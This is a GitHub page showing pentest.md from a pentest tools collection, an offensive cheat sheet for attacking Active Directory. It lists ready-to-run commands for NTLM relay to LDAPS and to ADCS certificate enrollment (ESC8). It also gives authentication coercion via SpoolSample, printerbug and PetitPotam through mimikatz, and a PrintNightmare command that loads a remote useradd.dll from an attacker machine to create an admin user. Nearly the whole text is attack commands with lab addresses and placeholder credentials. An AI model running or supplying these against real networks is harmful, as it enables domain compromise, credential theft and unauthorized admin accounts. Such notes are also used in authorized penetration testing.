Pentest-Tools-Collection/pentest.md at main · LuemmelSec/Pentest-Tools-Collection

Relay HTTP or sth (not SMB) to read AD or create new Admin User:
python3 ntlmrelayx.py -t ldaps://10.55.0.1
mitm6
arp spoofing
adidns
responder

adcs esc8
.\SpoolSample.exe 10.55.0.1 10.55.0.30
python3 printerbug.py mcafeelab.local/user123:SuperSecretPW@10.55.0.1 10.55.0.30
mimikatz # misc::spooler /server:dc1.lba.local /connect:kali.lab.local /authuser:domadm@lab.local /authpassword:secr3tpass
PetitPotam if http bla service is running (also possible from mimikatz: mimikatz # misc::efs /server:10.1.1.1 /connect:10.1.1.10 /noauth

python3 ntlmrelayx.py -t http://10.55.0.2/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

print nightmare
mimikatz # misc::printnightmare /server:dc1.lab.local /authuser:bla /authpassword:bla /library:\kali.lab.local\useradd.dll

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

FilesExpand file tree

pentest.md

Latest commit

History

pentest.md

File metadata and controls